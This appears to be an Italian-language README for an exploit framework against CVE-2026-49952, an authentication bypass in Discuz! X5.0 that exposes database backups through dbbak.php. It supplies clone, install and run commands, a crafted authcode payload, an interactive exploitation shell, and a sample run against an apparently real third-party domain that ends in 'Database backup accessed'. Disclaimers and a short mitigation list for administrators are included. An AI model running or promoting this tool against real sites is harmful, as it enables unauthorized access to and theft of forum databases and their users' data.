
Discuz! X5.0 Authentication Bypass Exploit Framework (CVE-2026-49952) - Vulnerabilità critica che consente l'accesso non autenticato ai backup del database tramite il riutilizzo dei token dell'oracolo di cifratura UC_KEY. CVSS 9.1. Strumento completo con rilevamento della versione, attacchi multi-payload, shell interattiva e sfruttamento automatizzato. Solo per test autorizzati.
⚡ CVE-2026-49952 | CVSS 9.1 (Critico) | Versione 1.0.0
Uno strumento professionale di penetration testing progettato per identificare e dimostrare la critica vulnerabilità di bypass dell'autenticazione in Discuz! X5.0.
AVVISO IMPORTANTE Questo strumento è fornito esclusivamente per scopi educativi e test di sicurezza autorizzati. NON utilizzare questo strumento su sistemi di cui non sei proprietario o per i quali non disponi di esplicita autorizzazione al test. L'accesso non autorizzato ai sistemi informatici è illegale e antietico. L'autore non si assume alcuna responsabilità per usi impropri o danni causati da questo strumento. Utilizzando questo strumento, accetti di conformarti a tutte le leggi e normative applicabili.
Discuz! X5.0 Authentication Bypass Exploit Framework è progettato per identificare e dimostrare la critica vulnerabilità di bypass dell'autenticazione (CVE-2026-49952) nelle versioni di Discuz! X5.0 rilasciate tra il 20 marzo 2026 e il 1 maggio 2026.
Questa vulnerabilità consente ad aggressori non autenticati di accedere alla funzionalità di backup del database (dbbak.php) sfruttando l'oracolo di crittografia UC_KEY per il riutilizzo dei token, esponendo potenzialmente contenuti sensibili del database.
🏆 Punteggio CVSS: 9.1 (Critico)
🔐 Impatto: Bypass dell'autenticazione
📂 Accesso: File di backup del database
⚡ Complessità: Bassa (facile da sfruttare)
🎯 Bersaglio: Discuz! X5.0 (20260320 - 20260501)
La vulnerabilità risiede nell'endpoint dbbak.php, dove il meccanismo di validazione del token si basa sull'oracolo di crittografia UC_KEY. Creando un payload specifico nella richiesta di login (member.php), un aggressore può ottenere un token di autenticazione valido che può essere riutilizzato per accedere alla funzionalità di backup del database senza un'autorizzazione adeguata.
❌ Discuz! X5.0 (20260320 - 20260501) - Vulnerabile
✅ Discuz! X5.0 (20260510+) - Corretta
🔍 Rilevamento della versione: Fingerprinting automatico e identificazione della versione di Discuz!.
⚡ Attacco multi-payload: Test parallelo di multiple varianti di payload.
🖥️ Shell interattiva: Interfaccia a riga di comando completa per lo sfruttamento manuale.
🚀 Sfruttamento automatizzato: Sfruttamento con un clic e configurazione minima.
📊 Salvataggio dei risultati: Esporta i risultati dello sfruttamento in file con timestamp.
🌐 Supporto proxy: Configurazione proxy HTTP/HTTPS per l'attraversamento di rete.
🎯 Scansione multi-thread: Numero di thread configurabile per l'ottimizzazione delle prestazioni.
🎨 Output a colori: Output del terminale professionale con codifica a colori.
🔐 Supporto SSL/TLS: Gestisce target sia HTTP che HTTPS.
🔄 Gestione delle sessioni: Mantiene lo stato della sessione persistente.
📦 Personalizzazione del payload: Supporto per l'iniezione di payload personalizzati.
🎯 Validazione del target: Verifica l'installazione di Discuz! prima dello sfruttamento.
Python: Versione 3.7 o superiore
Pip: Gestore dei pacchetti Python
# Clone the repository
git clone https://github.com/CerberusMrXi/Discuz-X5.0-Authentication-Bypass-Exploit-Framework
cd Discuz-X5.0-Authentication-Bypass-Exploit-Framework
# Install required packages
pip install -r requirements.txt
# Verify installation
python3 exploit.py --help
# Build the Docker image
docker build -t exploit .
# Run the container
docker run -it --rm exploit http://target.com
# Simple exploitation
python3 exploit.py http://target.com
# With output file
python3 exploit.py http://target.com --output results.txt
# Verbose mode for debugging
python3 exploit.py http://target.com --verbose
# With proxy and custom threads
python3 exploit.py https://target.com --proxy http://127.0.0.1:8080 --threads 10
# Custom payload
python3 exploit.py http://target.com --payload "admin|1|0|0"
python3 exploit.py http://discuz.eda.com.my
██████╗ ██╗███████╗██╗ ██╗███████╗███████╗██████╗
██╔══██╗██║██╔════╝██║ ██║╚══███╔╝╚══███╔╝╚════██╗
██║ ██║██║███████╗██║ ██║ ███╔╝ ███╔╝ █████╔╝
██║ ██║██║╚════██║██║ ██║ ███╔╝ ███╔╝ ██╔═══╝
██████╔╝██║███████║╚██████╔╝███████╗███████╗███████╗
╚═════╝ ╚═╝╚══════╝ ╚═════╝ ╚══════╝╚══════╝╚══════╝
Discuz! X5.0 Authentication Bypass Exploit Framework
CVE-2026-49952 | CVSS: 9.1 (Critical )
Author: Sudeepa Wanigarathna | Version: 1.0.0
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[14:32:15] ► Phase 1: Target Reconnaissance
[14:32:15] ➜ Testing connectivity to http://discuz.eda.com.my
[14:32:16] ➜ Detecting Discuz! version...
[14:32:16] ✔ Discuz! Version: X5.0
[14:32:16] ⚡ Target is running a vulnerable version!
[14:32:16] ► Phase 2: Authcode Acquisition
[14:32:16] ➜ Extracting authcode with payload: admin|1|0|0
[14:32:17] ✔ Authcode: aBcDeFgHiJkLmNoPqRsT...
[14:32:17] ► Phase 3: Exploitation
[14:32:17] ➜ Executing exploit (operation: backup )
[14:32:18] ✔ Exploit successful!
[14:32:18] ✔ Results saved to discuz_exploit_20260724_143218.txt
╔══════════════════════════════════════════════════════════╗
║ EXPLOIT SUCCESSFUL ║
╠══════════════════════════════════════════════════════════╣
║ Target: http://discuz.eda.com.my ║
║ Authcode: aBcDeFgHiJkLmNoPqRsT... ║
║ Status: Database backup accessed ║
║ Data Size: 24567 bytes ║
║ Saved to: discuz_exploit_20260724_143218.txt ║
╚══════════════════════════════════════════════════════════╝
Avvia la shell interattiva per lo sfruttamento manuale:
python3 discuz_exploit.py http://target.com --interactive
Utilizzare solo su sistemi di cui sei proprietario o per i quali hai esplicita autorizzazione al test.
Ottenere autorizzazione scritta prima di effettuare test.
Seguire le pratiche di divulgazione responsabile.
Segnalare le vulnerabilità ai fornitori in modo appropriato.
Utilizzare in ambienti di laboratorio isolati per l'apprendimento.
Non utilizzare mai su sistemi di produzione senza autorizzazione.
Non condividere pubblicamente dati ottenuti tramite exploit.
Non utilizzare mai per attività illegali o furto di dati.
Non modificare o eliminare dati durante i test.
Non sfruttare mai senza consenso.
Per gli amministratori di sistema:
Aggiorna immediatamente: Esegui l'upgrade a Discuz! X5.0 (20260510+) o versioni successive.
Disabilita l'endpoint: Disabilita temporaneamente dbbak.php se non necessario.
Monitora i log: Controlla accessi sospetti a member.php e dbbak.php.
Regole WAF: Implementa regole Web Application Firewall per bloccare richieste dannose.
Whitelist IP: Limita l'accesso all'endpoint di backup agli IP affidabili.
Error: Failed to connect to target
Solutions:
• Check if target URL is correct
• Verify network connectivity
• Check for firewalls blocking access
• Try with proxy: --proxy http://your_proxy:port
• Ensure target is online and accessible
Error: Authentication failed or invalid authcode
Solutions:
• Ensure the target Discuz! version is vulnerable
• Try different payloads for authcode extraction
• Check for network issues or WAF interference
• Run in verbose mode (--verbose ) for more details
Questo progetto è concesso in licenza sotto la MIT License.
Copyright © 2026 Sudeepa Wanigarathna
Con la presente è concessa gratuitamente a chiunque ottenga una copia di questo software e dei relativi file di documentazione (il "Software") l'autorizzazione a utilizzare il Software senza restrizioni, inclusi, a titolo esemplificativo ma non esaustivo, i diritti di utilizzare, copiare, modificare, fondere, pubblicare, distribuire, concedere in sottolicenza e/o vendere copie del Software, e di consentire alle persone a cui il Software è fornito di fare altrettanto, alle seguenti condizioni:
L'avviso di copyright sopra riportato e il presente avviso di autorizzazione devono essere inclusi in tutte le copie o parti sostanziali del Software.
IL SOFTWARE È FORNITO "COSÌ COM'È", SENZA GARANZIE DI ALCUN TIPO, ESPRESSE O IMPLICITE, INCLUSI, A TITOLO ESEMPLIFICATIVO MA NON ESAUSTIVO, LE GARANZIE DI COMMERCIABILITÀ, IDONEITÀ PER UN PARTICOLARE SCOPO E NON VIOLAZIONE. IN NESSUN CASO GLI AUTORI O I TITOLARI DEL COPYRIGHT SARANNO RESPONSABILI PER QUALSIASI RECLAMO, DANNO O ALTRA RESPONSABILITÀ, SIA IN UN'AZIONE CONTRATTUALE O ILLECITA, SIA DERIVANTE DA, IN CONNESSIONE CON IL SOFTWARE O L'USO O ALTRE OPERAZIONI CON IL SOFTWARE.
Autore: Sudeepa Wanigarathna | GitHub: @CerberusMrXi
⭐ Se trovi utile questo strumento, ti preghiamo di considerare di lasciare una stella!
🔐 Usa in modo responsabile. Sii etico. Continua a imparare.
| Attributo | Dettagli |
|---|
| Tipo di vulnerabilità | Bypass dell'autenticazione |
| ID CVE | CVE-2026-49952 |
| Versione CVSS | 3.1 |
| Punteggio CVSS | 9.1 (Critico) |
| Vettore di attacco | Rete |
| Complessità dell'attacco | Bassa |
| Privilegi richiesti | Nessuno |
| Interazione dell'utente | Nessuna |
| Impatto sulla riservatezza | Alto |
| Impatto sull'integrità | Alto |
| Impatto sulla disponibilità | Alto |
| Maturità del codice exploit | Funzionale |
| Livello di remediation | Fix ufficiale disponibile |
| Comando | Descrizione | Esempio |
|---|
help | Mostra tutti i comandi disponibili | help |
scan | Rileva la versione di Discuz! e verifica la vulnerabilità | scan |
get [payload] | Estrae l'authcode (payload personalizzato opzionale) | `get admin |
exploit [op] | Esegue l'exploit (predefinito: backup) | exploit backup |
save | Salva i risultati su file | save |
info | Mostra le informazioni della sessione | info |
clear | Pulisce lo schermo del terminale | clear |
exit / quit | Esce dalla shell interattiva | exit |